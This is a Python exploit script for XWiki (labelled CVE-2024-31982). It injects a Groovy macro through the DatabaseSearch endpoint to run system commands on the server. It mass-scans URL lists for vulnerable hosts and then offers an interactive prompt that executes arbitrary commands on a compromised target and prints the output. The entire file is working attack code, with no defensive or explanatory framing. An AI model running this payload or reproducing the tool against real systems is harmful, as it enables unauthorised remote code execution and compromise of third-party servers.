import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import json
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls
def check(url):
    url = url.rstrip("/")
    target = urljoin(url, "/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27echo%20HelloWorldtest%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    try:
        response = requests.get(target, verify=False, headers=headers,timeout=15)
        if response.status_code == 200 and 'HelloWorldtest' in response.text and 'Script' in response.text and 'org.xwiki' in response.text:
                print(f"\033[31mDiscovered:{url}: Xwiki_CVE-2024-31982_RCE!\033[0m")
                return True
    except Exception as e:
        pass

def run(url):
    url = url.rstrip("/")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    if check(url):
        while True:
            command = input("\033[34mPlease input command (stop input:exit):\033[0m")
            command = quote(command)
            command2="/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27command%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20".replace('command',command)
            target = urljoin(url,command2)
            if "exit" not in command:
                try:
                    response_sult = requests.post(target, verify=False, headers=headers,timeout=15)
                    if response_sult.status_code == 200 and 'groovy' in response_sult.text and 'Exception' in response_sult.text and 'org.xwiki' in response_sult.text:
                        pattern = r'Cause:\s*\[(.*?)\]'
                        match = re.search(pattern, response_sult.text)
                        if match:
                            extracted_content = match.group(1)
                            print(extracted_content)
                except Exception as e:
                    pass
            else:
                break

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        run(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")